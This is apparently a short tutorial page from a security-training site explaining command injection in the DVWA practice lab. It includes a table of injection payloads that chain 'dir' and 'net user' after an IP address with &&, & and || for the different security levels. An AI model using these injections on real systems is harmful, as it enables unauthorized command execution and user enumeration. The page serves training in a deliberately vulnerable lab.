DVWA Command-Injection
Previous NextExecute commands on a Operating system via a website
How to do Command Injection
Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies etc.) to a system shell.
💡 In simple word command injection is performed where the page is executing a command
Security Low
- Open the command injection page on dvwa, also available in mutillidae
- First, copy paste the given command to understand what it does.
- The command on this page is being injected because the ip address given here is output by pinging the address,
- And ping is the code of a command so we can inject any workable command here
192.168.43.170 && dir
List of all command injection cmd
Syntax : <Ip Address>< Operator ><CMD>
| CMD Name | Security Lavel | Description |
|---|---|---|
| 192.168.43.178 && dir | Low | By using this command, we can see the directory of the website. |
| 192.168.43.178 & dir | Medium | By using this command, we can see the directory of the website. |
| 192.168.43.178 || dir | High | By using this command, we can see the directory of the website. |
| 192.168.43.1 && net user | Low | By using this command, we can see the administrator of the system. |
| 192.168.43.1 & net user | Medium | By using this command, we can see the administrator of the system. |
| 192.168.43.1 || net user | High | By using this command, we can see the administrator of the system. |
ipconfig,help etc command work just follow the syntax
💡 Tip: Use (&&) for Low Security , (&) for medium security , (||) for high security
Previous Next
cybNg Designed for learning, testing and training. Examples are simplified to improve reading and basic understanding, tutorials and examples are constantly reviewed to avoid over-comprehension and errors, but we cannot warrant the complete accuracy of all content. While using this site, you agree to read and accept our use, cookie and privacy policy. All the information given in it is made for education purpose only, there will be no responsibility of this website or this organization for misuse of the information given in it. We hope that all the information provided in it is good for our students. So that it helps improve the cyber world.